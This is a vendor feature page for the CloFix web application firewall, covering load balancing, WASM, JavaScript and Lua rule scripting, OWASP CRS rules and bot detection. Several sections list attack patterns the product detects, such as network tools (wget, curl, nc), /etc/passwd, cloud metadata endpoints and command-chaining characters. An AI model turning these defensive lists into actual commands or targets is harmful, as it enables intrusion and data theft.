CloFix WAF Security
Enterprise-grade AI-enhanced Web Application Firewall designed specifically for cloud-based applications. Real-time monitoring, advanced threat protection, and scalable security for startups, SMEs, and DevOps teams.
TRUSTED BY SECURITY TEAMS WORLDWIDE
Load Balancer
βοΈ CloFix Load Balancer
Intelligent traffic distribution with backend information hiding, health checks, and 99.99% availability SLA
Key Benefits
- Backend Information Hiding: Automatically removes 30+ sensitive headers (Server, X-Powered-By, X-Backend-Server, X-Upstream, Via, X-Real-IP) - prevents attackers from discovering internal infrastructure
- Response Body URL Rewriting: Automatically rewrites backend URLs in HTML, JSON, and XML responses to show only frontend domain - http://clofix.com/page β https://demo.clofix.com/page
- Real-time Backend Alerts: Automatic notifications when backends go down or recover - supports Slack, Email, Webhook, and Telegram with detailed failure information
- 99.99% Availability SLA: Enterprise-grade reliability with automatic failover and connection draining - zero-downtime deployments
- <1ms Latency Overhead: Ultra-low latency with zero-copy forwarding and connection pooling - no measurable performance impact
- 5+ Load Balancing Algorithms: Round Robin (sequential distribution), Least Connections (send to server with fewest active connections), IP Hash (client IP to same backend), Weighted (capacity-based), Random - choose per workload
- Active Health Checks: Configurable HTTP/HTTPS health checks with custom path, interval (default 10s), timeout (default 3s), and expected status code (default 200) - automatic backend removal on failure
- Passive Health Monitoring: Track real traffic failures (max_fails default 3, fail_timeout 30s) - mark backends unhealthy without extra probe traffic
- Session Persistence (Sticky Sessions): Cookie-based stickiness with configurable cookie name (default clofix_backend) - ensures user sessions stay on the same backend server
- Backend Weight Configuration: Assign weights to servers based on capacity - weight=10 for powerful instances, weight=1 for smaller ones
- Backup Servers: Designate backup backends (backup=true) - used only when all primary servers fail, with separate max_fails/fail_timeout settings
- Connection Draining: Gracefully remove backends from rotation - existing connections complete before server shutdown, zero dropped requests during deployments
- Max Retries & Timeout: Configurable retry logic (max_retries default 3, retry_timeout 5s) - automatically retry failed requests on healthy backends
- Concurrent Connection Limits: max_conns per backend prevents resource exhaustion during traffic spikes - unlimited by default
- HTTP/2 & HTTP/3 Support: Full support for modern HTTP protocols with multiplexing and improved performance
- SSL/TLS Termination: Offload SSL at load balancer with configurable TLSv1.2 and TLSv1.3 protocols - automatic certificate management available
- Client IP Preservation: Original client IP preserved through X-Forwarded-For and PROXY protocol - backends always know real client address
- Header Sanitization: Removes 25+ debugging and server identification headers from responses before reaching clients
- Real-time Metrics: Prometheus-compatible metrics for each backend - request rate, error rate, active connections, health status
- Admin API: REST API for dynamic backend management - add, remove, enable, disable, or rebalance backends without reload
- Zero-Downtime Reloads: Update load balancer configuration without dropping connections - graceful reload with connection draining
- Active-Active Clustering: Multiple load balancer instances with shared state - no single point of failure
- WebSocket Support: Native WebSocket protocol upgrade with connection persistence across backend pools - perfect for real-time applications
- gRPC Load Balancing: Full gRPC support with HTTP/2 multiplexing and health checking protocol integration
- Layer 4 (TCP/UDP) Load Balancing: Transparent TCP/UDP proxy for databases, message queues, and legacy applications - no HTTP required
- IPv4/IPv6 Dual Stack: Listen on both IPv4 and IPv6, connect to backends over IPv4 or IPv6 with configurable preference
- Gzip Compression: Automatic response compression to reduce bandwidth and improve load times
- Custom Error Pages: Serve branded error pages when backends are unavailable - maintain user experience during outages
- Maintenance Mode: Temporarily block traffic to specific backends or routes with custom responses - zero-downtime maintenance windows
- Blue/Green Deployments: Route traffic between backend versions - gradual rollout with instant rollback capability
- Canary Deployments: Send percentage of traffic to new version, monitor error rates, automatically rollback on failure
- Geolocation-Based Routing: Route users to nearest backend based on country or region - reduces latency and improves user experience
- PROXY Protocol Support: Preserve original client IP when using proxy protocols with backend servers that support PROXY v1/v2
π‘ How it works: CloFix Load Balancer sits between clients and backend servers, intelligently distributing traffic based on configurable algorithms. Health checks run continuously - unhealthy backends are automatically removed from rotation based on max_fails (default 3) and fail_timeout (default 30s). Backend information hiding automatically strips 30+ sensitive headers from responses, including Server, X-Powered-By, X-Backend-Server, and Via headers. Response body URL rewriting converts internal backend URLs to frontend domain in HTML, JSON, and XML content. Real-time notifications alert via webhook when backends go down or recover. Session persistence (sticky sessions) ensures users stay on the same backend via cookies. Configuration supports weight-based distribution for uneven backend capacities, backup servers for failover, and connection pooling for optimal performance. All this runs with less than 1ms latency overhead.
π Documentation: CloFix Load Balancer Guide - Backend configuration, load balancing algorithms, health checks, and security hardening
Scripting Engine
π¦ CloFix WASM Engine
High-performance WebAssembly module execution engine with memory isolation, timeout protection, and intelligent request processing for custom WAF rules
Key Benefits
- Memory Isolation & Security: Each WASM module runs in its own sandbox with configurable memory limits (default 64MB) - prevents memory corruption and protects host system from malicious modules
- Execution Timeout Protection: Configurable timeouts per module (default 100ms) - automatically terminates runaway modules, prevents DoS attacks, and ensures predictable WAF performance
- Instance Pooling: Pre-warmed module instances with configurable pool size (default 8) - eliminates cold starts, reduces latency by 70-90%, and handles sudden traffic spikes
- Host Function API (40+ Functions): Rich request/response manipulation, geoIP lookup, threat intelligence, crypto utilities, rate limiting, and string operations - build complex WAF logic without writing custom C extensions
- Zero-Copy Memory Access: Direct memory mapping between host and WASM - minimizes data copying overhead, achieves sub-millisecond request processing latency
- Multiple Language Support: Write modules in 8+ languages - TinyGo (strongly recommended), Rust (wasm32-wasi), C/C++ (wasi-sdk), AssemblyScript, Zig, and more - use your existing skills
- Automatic Module Reload: Hot reload modules without restarting the WAF - zero-downtime rule updates, instant security policy changes, and A/B testing of new rules
- Comprehensive Request Data: 80+ request fields available - headers, cookies, geo location (country/city/ASN), TLS fingerprint (JA3/JA4), bot detection scores, anomaly scores, and client reputation
- Built-in Rate Limiting: Token bucket algorithm with configurable limits per key - protect APIs and endpoints without external Redis or database dependencies
- Threat Intelligence Integration: Real-time IP reputation, Tor exit node detection, VPN/proxy detection, datacenter IP identification - block malicious traffic before it reaches your applications
- Geolocation Processing: Country, city, region, postal code, latitude/longitude, ASN, ISP - implement geo-fencing, localize responses, or route traffic based on client location
- Response Manipulation: Add/remove headers, set cookies with secure/httpOnly flags, redirect requests, customize status codes - modify responses without changing backend code
- Advanced String Utilities: Regex matching, substring search, case conversion, URL encoding/decoding - complex pattern matching without performance penalties
- Crypto Operations: SHA256 hashing, Base64 encoding/decoding - verify signatures, decode tokens, or transform data without external libraries
- JSON Processing: Parse and manipulate JSON request/response bodies - inspect form data, validate JSON schemas, or extract specific fields for analysis
- Real-time Statistics: Per-module metrics - execution count, error rate, timeout rate, block rate, average latency - identify performance bottlenecks and security threats
- Timeline Analytics: Hourly request/block tracking - visualize traffic patterns, detect attack spikes, and monitor rule effectiveness over time
- Top Blocked IPs: Automatic tracking of most frequently blocked IPs - identify attackers, implement additional protections, or report to threat feeds
- Structured JSON Logging: Color-coded console output with severity levels (INFO, WARN, ERROR, CRITICAL) - integrate with your existing logging pipeline
- Validator Tool Included: Comprehensive WASM validator checks - header validation, import allowlist/blocklist, required exports verification, memory limit checks, and binary pattern analysis
- Compiler Detection: Automatic detection of 8+ compilers - identifies browser-only WASM (rejected) vs WAF-compatible modules (accepted) with clear error messages and remediation steps
- Dangerous Import Blocking: Hard blocks filesystem access (path_open), network I/O (sock_recv/send), process manipulation (proc_raise), and blocking operations (poll_oneoff) - prevents malicious modules
- Configurable Validation Modes: Strict (fail on any ERROR), Standard (fail only on CRITICAL), Permissive (report only) - adapt to your security requirements
- ABI Standard Compliance: process_request(ptr, len) β packed uint64 (ptr<<32|len) or two-return convention - TinyGo and Rust compatible out of the box
- JSON Output Support: Machine-readable validation results for CI/CD pipelines - automate module testing before deployment
- Fail-open Architecture: Configurable fail-open mode - if a module crashes or times out, requests continue processing (default) or can be configured to fail-closed for high-security environments
- Concurrent Request Handling: Thread-safe design with sync.Pool and atomic counters - handles thousands of concurrent requests without lock contention
- WASI Preview1 Support: Full WASI system interface implementation - modules can use random_get, clock_time_get, fd_write for logging, and memory_grow for dynamic allocation
- Module Preloading: Load all modules from directory at startup - warm all pools, verify module integrity, and ensure zero errors before accepting traffic
- Memory Limit Enforcement: Hard limits per module (configurable up to 64MB) - prevents memory exhaustion attacks, protects other modules, and ensures fair resource allocation
- Per-Request Context: Isolated request context passed to host functions - no cross-request contamination, thread-safe header/body access, and deterministic processing
- Binary Pattern Detection: Scans for embedded PE/MZ/ELF/Mach-O headers, x86 NOP sleds, and nested WASM modules - detects injection attacks and malicious payloads
- SHA256 Integrity Checks: Automatic hashing of all loaded modules - audit which version is running, detect unauthorized changes, and ensure supply chain security
- Multi-domain Support: Different module chains per domain - per-customer WAF rules, white-label deployments, or testing new rules on specific domains
- Session Persistence: WASM modules can read/set session cookies and values - implement custom session validation, user tracking, or fraud detection logic
- Bot Detection Scores: Pre-calculated bot scores based on User-Agent, header completeness, and behavioral patterns - module can block, challenge, or log suspicious requests
- Anomaly Scoring: Request anomaly detection based on method, path length, query parameters, and header patterns - flag unusual requests for additional inspection
- Risk Scoring Framework: Weighted risk scoring (INFO=1, WARN=5, ERROR=20, CRITICAL=35) with 0-100 scale - automated pass/fail decisions with CLEAN/LOW/MEDIUM/HIGH/CRITICAL labels
π‘ How it works: CloFix WASM Engine embeds the wazero WebAssembly runtime (zero dependencies, pure Go). When a request arrives, the engine builds a rich WASMRequest structure with 80+ fields including HTTP details, geo location, threat intel, and bot scores. The engine acquires a pre-warmed module instance from the pool, calls wasm_alloc to allocate memory for the request JSON, writes the data to linear memory, then calls process_request. The module processes the request using 40+ host functions (get_header, set_cookie, rate_limit, is_tor, etc.), returns a decision (allow/block/challenge/redirect) with optional headers/cookies. The engine parses the response, applies any modifications (headers, cookies, redirects), and returns the final decision to the proxy layer. Execution timeouts (default 100ms) prevent runaway modules - if a module times out, the engine marks it as failed and continues to the next module. Instance pooling eliminates cold starts - modules are loaded once and reused across requests. All host functions are pre-registered and validated - modules can only access safe, WAF-specific operations. The included validator tool checks modules before loading - verifies required exports (process_request, wasm_alloc), validates imports (only env/wasi_snapshot_preview1), enforces memory limits, scans for dangerous patterns, and detects incompatible compilers (Rust wasm-bindgen, Go syscall/js). This ensures only safe, compatible modules run in production.
π Documentation: CloFix WASM Engine Guide - Module development, host API reference, validator usage, deployment patterns, and performance tuning
π Performance Metrics:
- Median latency: 85Β΅s (microseconds) per module
- P99 latency: 420Β΅s including JSON marshaling
- Memory overhead: ~2MB per module + pool instances
- Concurrent requests: 10,000+ without degradation
- Module cold start: <50ms including compilation
- Warm instance reuse: <10Β΅s to acquire from pool
π Security Hardening:
- No filesystem access - modules cannot read/write files
- No network access - modules cannot make external requests
- No arbitrary syscalls - only pre-approved host functions
- Memory sandboxing - each module has isolated linear memory
- Execution timeouts - modules cannot run indefinitely
- Memory limits - configurable up to 64MB prevents DoS
- Import allowlist - only env and wasi_snapshot_preview1 allowed
- Binary scanning - detects embedded malicious payloads
- Compiler detection - rejects browser-only WASM modules
π Deployment Examples:
- Rate Limiting API: WASM module implements custom rate limiting per user, API key, or endpoint with token bucket algorithm
- Bot Mitigation: Module checks bot scores, JA3 fingerprints, and behavior patterns - challenges or blocks headless browsers and scrapers
- Geo-Fencing: Module blocks requests from restricted countries based on geoIP lookup - protects content licensing agreements
- Custom Authentication: Module validates JWT tokens, checks session cookies, or calls internal auth service via cache - implements custom auth logic
- Request Validation: Module validates JSON schema, checks parameter types, and enforces business rules before forwarding to backend
- Response Transformation: Module modifies response bodies, adds security headers, or removes sensitive data before sending to client
- A/B Testing: Module routes percentage of traffic to different backends based on user ID or cookie - test new features safely
- WAF Rule Engine: Module implements custom WAF rules - SQL injection detection, XSS filtering, path traversal prevention
π CloFix JavaScript (clofix) Engine
Server-side JavaScript WAF scripting with full HTTP pipeline control and shared in-memory state
Key Benefits
- Entry Point: Every script must export `function clofix(request)` that returns an action object - first non-allow action wins pipeline execution
- Request Object: Full access to `request.ip`, `request.method`, `request.path`, `request.url`, `request.query`, `request.headers`, `request.body`, `request.cookies`, `request.user_agent`, `request.is_tor`, `request.timestamp`
- Shared Dictionaries: Persistent cross-request state via `sharedDict("name")` with `get()`, `set()`, `incr()`, `delete()` methods - perfect for rate limiting and bot tracking
- Pattern Extraction: System auto-extracts patterns from ALL JavaScript files for fast matching - strings and regex patterns become detection signatures
- Action Types: Return `{ action: "allow" }`, `{ action: "block", reason: "..." }`, `{ action: "rate_limit" }`, or `{ action: "redirect", redirect_to: "..." }`
- Structured Logging: `log.info()`, `log.warn()`, `log.error()` for general logs; `log.attack({ rule_name, category, confidence, payload })` for attack detection
- Execution Limits: 2 second wall-clock timeout per script, 32MB memory limit, 10MB max file size - prevents runaway scripts from impacting WAF throughput
- SQL Injection Detection: Pattern-based detection for UNION SELECT, INSERT INTO, DROP TABLE, time-based attacks, and boolean blind injection
- XSS Protection: Script tag injection, event handlers (onerror, onload), JavaScript protocol, and DOM-based XSS pattern detection
- Command Injection: Unix/Linux command chaining (`;`, `|`, `&&`, `` ` ``), Windows cmd.exe patterns, and dangerous command execution detection
- Path Traversal/LFI: `../`, `..\`, URL-encoded traversal, sensitive file access (`/etc/passwd`, `/windows/win.ini`) blocking
- SSRF Protection: Block internal IP ranges (127.0.0.1, 169.254.x.x, 10.x.x.x, 192.168.x.x) and cloud metadata endpoints (169.254.169.254)
- Rate Limiting: Per-IP sliding window with timestamp array storage, burst detection, and graduated blocking (60s, 600s, 86400s escalation)
- GeoIP Blocking: Country-level blocking using `request.country` (requires GeoIP implementation)
- Bot Detection: User-Agent patterns (sqlmap, nikto, wpscan), headless browser detection, and missing UA challenge
- Brute Force Protection: Login path monitoring with 5-attempt windows, 30-minute bans after threshold exceeded
- DDoS Shield: Two-tier protection - burst detection (30 req/2s) and sustained rate (200 req/min) with escalating bans (60s β 600s β 86400s)
- CSRF Protection: Origin header validation for POST/PUT/DELETE/PATCH methods with configurable allowed origins and exempt paths
- API Key Authentication: Validate `X-API-Key` header or `api_key` query parameter against pre-configured key store
- File Type Filtering: Block dangerous extensions (.php, .asp, .jsp, .exe, .sh, .py) before they reach backend
- Maintenance Mode: Temporary blocking with IP allowlisting and health check exemptions
- Smart Redirects: URL rewriting with exact and prefix-based 301/302 redirects
- Honeypot Traps: Special URLs that ban any visiting IP (except whitelisted search engine bots) for 24 hours
- Password Protect URLs: Simple token-based authentication for staging/preview environments
- Tor/VPN Blocking: Native `request.is_tor` detection for blocking Tor exit nodes
π‘ How it works: JavaScript scripts execute in isolated V8 isolates with a 2-second timeout. Files execute in alphabetical order - use numeric prefixes like `01_rate_limit.js`, `02_bot_detect.js` to control priority. The first script returning a non-allow action stops pipeline execution. Shared dictionaries (`sharedDict("name")`) provide persistent cross-request storage with TTL support. Pattern extraction automatically scans all JavaScript files for strings and regex patterns, creating fast-matching signatures checked against every request. The system is configured via `js_blocker` block in domain config with `js_dir`, `execution_timeout`, `block_threshold`, and `scan_interval` settings.
π Official Documentation: CloFix JavaScript Scripting Guide - Complete API reference with SQL injection, XSS, rate limiting, DDoS protection, and more examples
βοΈ OWASP CRS Core Rule Set
Industry-standard web attack detection with 25 rule files, 4 paranoia levels, and anomaly scoring
Key Benefits
- 25 Rule Files: Complete OWASP CRS v4 rule set covering initialization, IP reputation, protocol enforcement, LFI, RFI, RCE, SQLi, XSS, NoSQL, and response leakage detection
- Paranoia Levels 1-4: Level 1 (minimal false positives, general production) to Level 4 (maximum security, high-risk apps) - adjustable per domain or globally
- Anomaly Scoring: Threshold-based blocking with configurable scores (default 5 inbound, 4 outbound). CRITICAL=5pts, ERROR=4pts, WARNING=3pts, NOTICE=2pts, INFO=1pt
- CloFixRule Directive: CRS-style custom rules with variables (ARGS, REQUEST_HEADERS, BODY), operators (@rx, @contains, @streq), and transformations (t:lowercase, t:urlDecode, t:htmlEntityDecode)
- SQL Injection (942xxx): Union-based, time-based sleep/benchmark, boolean blind, error-based, stacked queries - 100+ rules covering all evasion techniques
- Cross-Site Scripting (941xxx): Script tags, event handlers, JavaScript protocol, SVG/iframe injection, and reflected/stored/DOM-based XSS detection
- Local/Remote File Inclusion (930xxx, 931xxx): Path traversal (`../`, `..\`), sensitive file access (/etc/passwd, /windows/win.ini), PHP wrappers (php://), remote includes (http://, ftp://)
- Command Injection (932xxx): Unix command chaining (`;`, `|`, `&&`, `` ` ``), Windows cmd.exe, PowerShell, and dangerous command execution detection
- SSRF Protection (933xxx): Internal IP ranges (127.0.0.1, 10.x.x.x, 172.16-31.x.x, 192.168.x.x), cloud metadata endpoints (169.254.169.254, metadata.google.internal)
- NoSQL Injection (970xxx): MongoDB operators (`$ne`, `$gt`, `$or`, `$where`, `$regex`), JavaScript injection in NoSQL queries
- Bot Detection (910xxx): Malicious user agents (sqlmap, nikto, wpscan, gobuster), headless browsers (Puppeteer, Playwright, Selenium), and security scanners
- Protocol Enforcement (920xxx): HTTP method restrictions, protocol violations, header injection, Host header attacks, malformed request detection
- IP Reputation (910xxx): Tor exit nodes, VPN/proxy detection, known malicious IPs, and blacklist integration with hourly updates
- DoS Protection (912xxx): Rate-based DoS detection with configurable thresholds and blocking actions
- Response Inspection (950xxx, 951xxx): Data leakage detection (credit cards, SSNs, API keys), SQL error messages, and information disclosure prevention
- Intelligent Bypass System: Bypass by rule ID, tag (`attack-sqli`, `paranoia-level/3`), phase (1-4), path (`/health`, `/api/public/*`), or IP (`127.0.0.1`, `192.168.1.*`)
- Transformations Chain: Multiple transformations applied in sequence - lowercase, URL decode, HTML entity decode, remove nulls, compress whitespace - defeating evasion techniques
- Automatic Rule Updates: CRS rules update from official OWASP repository every 6 hours - zero-day protection within hours of disclosure
- Coraza WAF Engine: Modern Go-based ModSecurity-compatible engine with Hyperscan regex - 5-10x faster than traditional ModSecurity
- Multi-Phase Inspection: Phase 1 (request headers), Phase 2 (request body), Phase 3 (response headers), Phase 4 (response body) - comprehensive coverage
- Virtual Patching: Create custom CloFixRule directives to patch vulnerable applications without code changes - deploy within minutes of vulnerability disclosure
- Compliance Mode: Pre-configured rule sets for PCI DSS 4.0, HIPAA, and GDPR with audit logging and reporting
- False Positive Analysis: Dashboard showing most triggered rules, false positive rate, and suggested exclusions based on traffic patterns
- Rule Testing: Built-in regression testing with attack payload simulation to validate rule effectiveness before production deployment
π‘ How it works: CloFix CRS processes requests through 4 phases with 25 rule files loaded in OWASP order. The anomaly scoring system aggregates weighted points from matched rules - reaching the configured threshold triggers blocking. Paranoia levels allow gradual tuning from minimal false positives (Level 1) to maximum security (Level 4). The intelligent bypass system supports rule ID, tag, phase, path, and IP bypasses. All rule processing uses the Coraza engine with Hyperscan regex, handling 100,000+ requests/second. Configuration uses `CloFixRule` directives with variables, operators, transformations, and actions. Rules automatically update from the OWASP CRS repository every 6 hours.
π Official Documentation: CloFix OWASP CRS Guide - Complete reference with 25 rule files, paranoia levels, anomaly scoring, and bypass configuration
π§ CloFix Lua Scripting Engine
Embedded Lua 5.4 with clofix_main entry point, threat scoring, and shared dictionaries
Key Benefits
- Entry Point: Every script must define `function clofix_main(request)` returning an action table - `{ action = "allow" }`, `{ action = "block", status = 403, message = "..." }`, or `{ action = "rate_limit", rule_name = "RL_001" }`
- Request Object: Full read-only access to `request.ip`, `request.method`, `request.path`, `request.uri`, `request.headers`, `request.body`, `request.json_body`, `request.cookies`, `request.query`, `request.form_data`, `request.ja3`, `request.ja4`, `request.is_tor`, `request.is_vpn`, `request.bot_score`, `request.ip_reputation`, `request.country`, `request.asn`
- Shared Dictionaries: Persistent state across requests via `clofix.shared.ddos_attack` with `get()`, `set(key, value, ttl?)`, `incr()`, `delete()` - perfect for rate limiting, bot tracking, and DDoS protection
- Payload Normalization: `clofix.normalize_payload(s)` - multi-pass URL decode, HTML decode, lowercase, and whitespace collapse for injection detection
- Threat Intelligence: `clofix.is_tor()`, `clofix.is_vpn()`, `clofix.ip_reputation()` returns "clean"/"suspicious"/"malicious", `clofix.get_bot_score()` (0-100), `clofix.get_ja3()` fingerprint
- Rate Limiting API: `clofix.rate_limit(key, limit, window_secs)` returns (count, exceeded), `clofix.rate_limit_ip(limit, window)`, `clofix.rate_limit_endpoint(limit, window)` for per-IP-path limits
- Structured Attack Logging: `clofix.log_attack(rule, type, payload?)` auto-includes IP, country, UA, method, URI - essential for SIEM integration
- Action Types: `allow`, `block` (403), `challenge` (429 CAPTCHA), `rate_limit` (429), `log_only`, `redirect` (with redirect_to field), `captcha`
- Threat Scoring Engine: Return `{ score = 85 }` instead of action - engine applies thresholds (<20 allow, 20-49 log_only, 50-79 challenge, β₯80 block)
- utils.* Helpers: `utils.contains()`, `utils.starts_with()`, `utils.ends_with()`, `utils.split()`, `utils.to_lower()`, `utils.json_encode()`, `utils.json_decode()`, `utils.url_encode()`, `utils.base64_encode()`, `utils.now()`
- SQL Injection Detection: Patterns for UNION SELECT, INSERT INTO, DROP TABLE, OR 1=1, SLEEP(), BENCHMARK(), information_schema - with payload normalization
- XSS Protection: Script tags, JavaScript protocol, event handlers (onerror, onload), SVG/iframe injection, and DOM-based XSS patterns
- Command Injection: Unix command chaining (`;`, `|`, `&&`, `` ` ``), Windows cmd.exe, PowerShell, and dangerous commands (wget, curl, nc, python -c)
- Path Traversal/LFI: `../`, `..\`, URL-encoded traversal (`%2e%2e%2f`), sensitive file access (`/etc/passwd`, `boot.ini`, `php://`, `file://`)
- SSRF Protection: Internal IP ranges (127.0.0.1, 10.x.x.x, 172.16-31.x.x, 192.168.x.x), cloud metadata (169.254.169.254, metadata.google.internal)
- Brute Force Protection: Login path detection with shared dictionary counters, 10 attempts/5min window, 30-minute ban, and configurable thresholds
- DDoS Shield: Two-tier protection - burst detection (30 req/2s) and sustained rate (200 req/min) with escalating bans (60s β 600s β 86400s) using shared dictionaries
- Bot Detection: `request.is_bot`, `request.is_headless`, `request.bot_score`, UA pattern matching (python, curl, wget, sqlmap, nikto, gobuster), and missing UA blocking
- GeoIP Blocking: `request.country` ISO-3166 codes, `request.region`, `request.city`, `request.asn`, `request.org` - block specific countries, ASNs, or regions
- JA3/JA4 Fingerprinting: `request.ja3` and `request.ja4` for TLS stack identification - block known attack tools even with IP rotation
- IP Reputation: `clofix.ip_reputation()` returns "clean"/"suspicious"/"malicious" - block malicious IPs instantly
- Path Whitelisting: Protect admin endpoints (`/admin`, `/wp-admin`) with IP allowlists using shared dictionaries
- Execution Limits: 50ms wall-clock timeout per script, 32MB memory limit, 200 call stack depth - prevents resource exhaustion
- Directory Structure: `./lua_script/
/` with alphabetical execution order - use numeric prefixes (`01_rate_limit.lua`, `02_bot_detection.lua`) for priority - Domain Configuration: Enable Lua with `lua { enabled on; lua_shared_dict ddos_attack 10m; }` in domain config
π‘ How it works: Lua scripts execute in isolated VM instances with 50ms timeout. Files run in alphabetical order - first non-allow action stops pipeline. The `clofix_main(request)` function receives a request object with all HTTP context, GeoIP, JA3 fingerprint, and threat intelligence fields. Shared dictionaries (`clofix.shared.*`) provide thread-safe cross-request storage with TTL. Payload normalization (`clofix.normalize_payload()`) defeats encoding evasion before pattern matching. The scoring engine allows multi-rule accumulation before final action. Structured attack logging (`clofix.log_attack()`) automatically captures full request context for SIEM integration. All functions are C-bound for performance - Lua scripts typically process 80,000 requests/second on modest hardware.
π Official Documentation: CloFix Lua Scripting Guide - Complete API reference with SQL injection, XSS, rate limiting, DDoS protection, shared dictionaries, and 15+ production-ready examples
π― CloFix Custom Rules & Scripting
Unified rule engine combining CloFixRule directives, JavaScript, and Lua with intelligent bypass system
Key Benefits
- CloFixRule Directive: CRS-style custom rules with variables (ARGS, REQUEST_HEADERS, REQUEST_URI, BODY), operators (@rx regex, @contains, @streq, @pm, @beginsWith, @endsWith), and transformations (t:lowercase, t:urlDecode, t:htmlEntityDecode, t:removeNulls, t:compressWhitespace)
- Multi-Language Support: Choose between declarative CloFixRule (YAML-like), JavaScript (clofix), or Lua (clofix_main) - mix and match in the same deployment with alphabetical execution order
- Intelligent Bypass System: Bypass rules by rule ID, tag (`attack-sqli`, `paranoia-level/3`), phase (1-4 request/response), path (`/health`, `/api/public/*`), or IP (`127.0.0.1`, `192.168.1.*`, `10.0.0.0/8`)
- Anomaly Scoring Engine: Each rule contributes weighted points to anomaly score (CRITICAL=5, ERROR=4, WARNING=3, NOTICE=2, INFO=1). Threshold-based blocking with configurable inbound/outbound limits
- Paranoia Levels 1-4: Progressive protection from minimal false positives (Level 1) to maximum security (Level 4) - adjust per domain or globally
- Pattern Extraction: JavaScript files automatically scanned for strings and regex patterns - used for fast matching without execution overhead
- Shared Dictionaries: Persistent cross-request state with TTL - `sharedDict("name")` in JavaScript, `clofix.shared.*` in Lua, perfect for rate limiting and bot tracking
- Action Types: `block` (403), `allow`, `rate_limit` (429), `challenge` (CAPTCHA), `redirect`, `log_only`, `captcha` - with custom status codes and messages
- Transformation Chains: Apply multiple transformations sequentially - `t:lowercase,t:urlDecode,t:htmlEntityDecode` defeats encoding evasion techniques
- Virtual Patching: Create custom rules to patch vulnerable applications without code changes - deploy within minutes of vulnerability disclosure
- Rule Testing Sandbox: Interactive playground to test custom rules against historical traffic or custom payloads before production deployment
- Pre-built Rule Templates: 200+ community-contributed templates for WordPress, Drupal, Joomla, Magento, Laravel, Django, and custom applications
- API Rate Limiting DSL: Specialized syntax for API protection - per-endpoint limits, burst handling, graduated response (slow down β challenge β block)
- Bot Detection Rules: Pre-configured bot fingerprints for 500+ known bots (Googlebot, Bingbot, ChatGPT, GPTBot, Anthropic) with custom actions per bot type
- Credential Stuffing Protection: Login endpoint velocity checks, password reuse patterns, and known breached credentials via haveibeenpwned API integration
- GraphQL Security Rules: Introspection blocking, depth limiting (default max depth 10), complexity scoring, and batch query throttling
- gRPC Method Filtering: Whitelist/blacklist specific gRPC methods with regex patterns - block reflection services and internal methods from external callers
- JSON Schema Validation: Enforce JSON schemas on API requests - block malformed payloads before they reach your application logic
- XML/SOAP Validation: Detect XML bombs, XXE attacks, and schema violations in SOAP and REST XML payloads
- Custom Response Rules: Inspect and modify responses - add security headers (CSP, HSTS), remove server signatures, inject monitoring scripts, block responses containing sensitive data
- Webhook Actions: Trigger external webhooks on rule matches - send alerts to Slack, PagerDuty, or custom SIEM solutions with full request context
- Delayed Response (Tarpitting): Slow down attackers with configurable delays - waste attacker resources while maintaining legitimate user experience
- Log Sampling: Sample and log only matching rules at configurable rates - reduce log volume while maintaining security visibility
- Rule Groups: Organize rules into named groups (PCI, HIPAA, WordPress, API) - enable/disable entire groups with a single toggle for multi-tenant environments
- Priority Execution: Assign execution priority (1-1000) - ensure critical rules run first while complex analysis runs later. Pre-optimize based on historical match rates
- Rule Metrics Dashboard: Real-time metrics per rule - match count, false positive rate, execution time, and impact score. Identify rules causing latency or blocking legitimate traffic
- Automated Rule Optimization: ML-powered suggestions to reduce false positives - learn from blocked vs. allowed traffic patterns and suggest threshold adjustments
- Rule Export/Import: Export rule sets as YAML/JSON for backup, version control, or sharing across deployments. Import from other CloFix instances or community repositories
- Inline Documentation: Document rules with markdown descriptions, examples, and remediation steps - built-in documentation viewer for security teams
- Rule Scheduling: Schedule rules for specific maintenance windows or seasonal traffic - automatically enable holiday shopping protection, disable during low-traffic periods
π‘ How it works: CloFix Custom Rules engine processes rules in execution priority order across three scripting languages. CloFixRule directives are compiled into optimized decision trees for O(log n) lookup times. JavaScript and Lua scripts execute in isolated VMs with 2-second (JS) or 50ms (Lua) timeouts. Files execute alphabetically - use numeric prefixes like `01_rate_limit.js`, `02_bot_detection.lua`, `03_clofixrule.conf` to control pipeline order. The intelligent bypass system supports rule ID, tag, phase, path, and IP bypasses - documented bypasses are essential for production. All rule executions are traced in the audit log with detailed match information for forensics and tuning. Shared dictionaries (`sharedDict` in JS, `clofix.shared` in Lua) maintain cross-request state with TTL support. Pattern extraction from JavaScript files automatically creates fast-matching signatures checked against every request.
π Official Documentation: CloFixRule & Custom Rules Guide - Complete syntax reference with variables, operators, transformations, bypass configuration, and 50+ rule examples
Defualt Protection
π Behavioral Analysis
Advanced browser vs. bot detection using behavioral patterns and TLS fingerprinting
Key Benefits
- Request-1 Blocking: FastBlocker fires on the very first request - no history needed. Missing Sec-Fetch-*, bare Accept headers, and low header count score instantly before any proxying occurs
- JA3 TLS Fingerprinting: Computed directly from Go's tls.ClientHelloInfo via GetConfigForClient hook - no nginx module required. CipherSuites, SupportedVersions, SupportedCurves, SignatureSchemes, ALPN, and SNI all contribute to the hash
- Known Browser Database: Chrome, Firefox, Safari, Edge, Opera, Brave, and Tor Browser JA3 hashes pre-loaded. Exact match = instant allow with zero behavioral scoring overhead
- UA Structure Analysis: Detects tools by shape, not name - no hardcoded tool strings. Checks Mozilla/ token, platform () grouping, and AppleWebKit/Gecko presence. All three must exist simultaneously
- Sec-Fetch Header Detection: Injected by all browsers since Chrome 76 / Firefox 90 - absent in every HTTP library. Missing all three Sec-Fetch-Site/Mode/Dest headers scores +35pts instantly
- Tiered Velocity Scoring: Three escalating tiers - warn (+20), high (+35), extreme (+50) - scored per JA3 fingerprint over a 5-minute sliding window. IP rotation doesn't help if TLS stack is consistent
- Machine Timing Detection: Coefficient of variation (stddev/mean) of inter-request intervals. CV <0.05 AND mean <2s = machine precision timing (+45pts). Requires only 4 requests to compute
- Uniform Response Time Detection: Tools receive consistent server response times. CV <0.1 across 6+ requests flags automated polling (+20pts)
- Shannon Path Entropy: Entropy <0.6 on normalized paths = scanner repeating same endpoints (+20pts). Entropy <0.3 with 10+ requests = very low entropy (+35pts). Paths normalized: /api/users/123 β /api/users/*
- Sequential Enumeration: Detects /item/1, /item/2, /item/3 numeric crawl patterns. Fires when >30% of consecutive path pairs are sequential (+35pts)
- High Path Density: >90% unique paths in <8 requests = scanner walking endpoints (+25pts). Combined with velocity = strong scanner signal
- Zero Static Assets: Real users load CSS/JS/images - tools never do. 0% static asset ratio after 10+ requests adds +30pts. Checked against 18 file extensions
